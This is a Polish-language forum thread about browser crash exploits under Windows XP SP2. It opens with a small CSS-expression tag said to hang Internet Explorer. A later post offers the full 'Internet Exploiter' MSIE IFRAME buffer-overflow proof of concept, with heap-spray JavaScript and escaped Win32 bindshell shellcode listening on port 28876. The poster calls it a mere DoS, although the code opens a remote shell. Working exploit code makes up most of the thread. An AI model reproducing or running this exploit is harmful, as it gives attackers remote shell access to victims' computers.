Exploit pod Windows XP z SP2

Roaders

Użytkownik
Dołączył
Kwiecień 17, 2006
Posty
79
Witam!

Znalazłem Coś ciekawego i interesującego ..... :yes:

Zorbiłem stronę www na której umieściłem poniższy kod:

Kod:
<IMG width="0" height="0" style="width: expression(alert());">

Po umieszczeniu tego kodu działa to jak błąd (exploit) nawet pod systemami Windows Xp z łatką Sp2! Pod kazdym systemem wyskakuje błąd na stronie www a po czasie twój system Windows dojdzie do Crashu (zawieszenia systemu) ! :yes:

Pozdrawiam!
 

Eliot

Użytkownik
Dołączył
Lipiec 7, 2004
Posty
37
Jakos na moja opere to nie dziala wiec to nie jest raczej exploit na winde a raczej na Ie badz fire foxa. Kiedy uruchomilem ten kod na ie to zablokowal mi zawartosc strony i do bledu nie doszlo, to juz jest zalatane. Pozdro.
 

Roaders

Użytkownik
Dołączył
Kwiecień 17, 2006
Posty
79
Witam!

Hmmm.... Ja nie mam załączonych automatycznych aktualizacji. To nie wiem ale mam Sp2 i mam Opere i IE. Na Operze nic się nie dzieje. Nawet nie dochodzi do błędu. A jesli chodzi o IE to wyskakuje mi błąd a po 20 sekundach system się wiesza. Może i prawda łatka napewno juz wyszła ale pewny nie jestem.

Pozdrawiam!
 

Eliot

Użytkownik
Dołączył
Lipiec 7, 2004
Posty
37
Moze to dosyc aktualny bug jednak latka juz wyszla a ja rowniez nie mam wlaczonej auto-aktualizacji. Po prostu co kwartal zagladam tam i sciagam co wazniejsze. A na ie jest jeszcze masa nie zalatanych dosow.
 

D0han

Były Moderator
Dołączył
Lipiec 27, 2005
Posty
975
Niezle Pepi, musialem na chama wylaczyc mojego FF, a plik wymiany osiagnal ok 2GB, ladne rzeczy no
<
 

D0han

Były Moderator
Dołączył
Lipiec 27, 2005
Posty
975
Owszem, moze i wykrywa ale ja nie urzywam zadnych FW (ok, ok - wbudowany w SP2) ani AV bo wole zdac sie na moje umiejetnosci (poza tym moj komp nie wytrzymalby dzialania tych kilku programow na raz jeszcze).
 

Pepi

Użytkownik
Dołączył
Maj 29, 2004
Posty
245
hehe

ten link to pakiet 3 bugow
1. *.wmf bug
2. IE spoof bug
3. DoS for many OS/Internet Browser
 

]-[aCker 69

Użytkownik
Dołączył
Grudzień 18, 2004
Posty
33
Originally posted by D0han
Owszem, moze i wykrywa ale ja nie urzywam zadnych FW (ok, ok - wbudowany w SP2) ani AV bo wole zdac sie na moje umiejetnosci (poza tym moj komp nie wytrzymalby dzialania tych kilku programow na raz jeszcze).

Ja podobnie jak wyżej nie używam Fw innego od SP2 ani AV i pamięć SWAP miałem 1333 mb
<
:D peace :]

Nieźle muli no ale w pore magiczną kombinacje wcisnąłem ctr + alt + del :] i mojego IE osiodłałem
<
P

nie no niezły bajzel zrobił jak spojżałem na pamięć podręczną to .....
 

Grzem

Użytkownik
Dołączył
Marzec 18, 2006
Posty
55
Jeżeli chcecie exploita w html-u działającego na xp z sp2 t prosze bardzo

Kod:
<HTML><!-- 

________________________________________________________________________________ 



,sSSSs, Ss, Internet Exploiter v0.1 

SS" `YS' '*Ss. MSIE <IFRAME src=... name="..."> BoF PoC exploit 

iS' ,SS" Copyright (C) 2003, 2004 by Berend-Jan Wever. 

YS, .ss ,sY" [url]http://www.edup.tudelft.nl/~bjwever[/url] 

`"YSSP" sSS <[email protected]> 

________________________________________________________________________________ 



This program is free software; you can redistribute it and/or modify it under 

the terms of the GNU General Public License version 2, 1991 as published by 

the Free Software Foundation. 



This program is distributed in the hope that it will be useful, but WITHOUT 

ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS 

FOR A PARTICULAR PURPOSE. See the GNU General Public License for more 

details. 



A copy of the GNU General Public License can be found at: 

[url]http://www.gnu.org/licenses/gpl.html[/url] 

or you can write to: 

Free Software Foundation, Inc. 

59 Temple Place - Suite 330 

Boston, MA 02111-1307 

USA. 

--> 



<SCRIPT language="javascript"> 

// Win32 MSIE exploit helper script, creates a lot of nopslides to land in 

// and/or use as return address. Thanks to blazde for feedback and idears. 



// Win32 bindshell (port 28876, '0' free, looping). Thanks to HDM and 

// others for inspiration and borrowed code. 

shellcode = unescape("%u4343%u4343%u43eb%u5756%u458b%u8b3c%u0554%u01 

78%u52ea%u528b%u0120%u31ea%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u1 

3cf%u01ac%u85c7%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8 

b4b%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64%u3040%u4 

08b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c%u6850%u3233%u642e%u 

7768%u3273%u545f%u71bb%ue8a7%ue8fe%uff90%uffff%uef89%uc589%uc481%ufe 

70%uffff%u3154%ufec0%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0% 

u5050%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6%u50c0%u 

3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650%u81bb%u2cb4%ue8be%u 

ff42%uffff%uc031%u5650%ud3bb%u58fa%ue89b%uff34%uffff%u6058%u106a%u5054 

%ubb56%uf347%uc656%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964% 

u41e1%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353%u5353 

%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353%u5343%u534b%u51 

53%u8753%ubbfd%ud021%ud005%udfe8%ufffe%u5bff%uc031%u5048%ubb53%ucb43 

%u5f8d%ucfe8%ufffe%u56ff%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u61 

5c%u89eb"); 

// Nopslide will contain these bytes: 

bigblock = unescape("%u0D0D%u0D0D"); 

// Heap blocks in IE have 20 dwords as header 

headersize = 20; 

// This is all very 1337 code to create a nopslide that will fit exactly 

// between the the header and the shellcode in the heap blocks we want. 

// The heap blocks are 0x40000 dwords big, I can't be arsed to write good 

// documentation for this. 

slackspace = headersize+shellcode.length 

while (bigblock.length<slackspace) bigblock+=bigblock; 

fillblock = bigblock.substring(0, slackspace); 

block = bigblock.substring(0, bigblock.length-slackspace); 

while(block.length+slackspace<0x40000) block = block+block+fillblock; 

// And now we can create the heap blocks, we'll create 700 of them to spray 

// enough memory to be sure enough that we've got one at 0x0D0D0D0D 

memory = new Array(); 

for (i=0;i<700;i++) memory[i] = block + shellcode; 

</SCRIPT> 

<!-- 

The exploit sets eax to 0x0D0D0D0D after which this code gets executed: 

7178EC02 8B08 MOV ECX, DWORD PTR [EAX] 

[0x0D0D0D0D] == 0x0D0D0D0D, so ecx = 0x0D0D0D0D. 

7178EC04 68 847B7071 PUSH 71707B84 

7178EC09 50 PUSH EAX 

7178EC0A FF11 CALL NEAR DWORD PTR [ECX] 

Again [0x0D0D0D0D] == 0x0D0D0D0D, so we jump to 0x0D0D0D0D. 

We land inside one of the nopslides and slide on down to the shellcode. 

--> 

<IFRAME SRC=file://BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB 

BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB 

BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB 

BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB 

BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB 

BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB 

BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB 

BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB NAME=" 

CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC 

CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC 

CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC 

CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC 

CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC 

CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC 

CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC 

CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC 

CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC 

CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC 

CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC 

CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC 

CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC 

CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC 

CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC 

CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC 

CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC 

CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC 

CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC 

CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC 

CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC 

CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC 

CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC 

CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC 

CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC 

CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC 

CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC 

CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC 

CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC 

CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC 

CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC 

CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC??"></IFRAME> 

</HTML>


Sam sie na to nadziałem przez przypadek i musiałem instalować od nowa winde (chyba nie musze mówić że to exploit typu dos). Avast reagował ale dopiero na zainfekowane pliki co jeszcze bardziej pogarszało sytuacje.
 
Do góry Bottom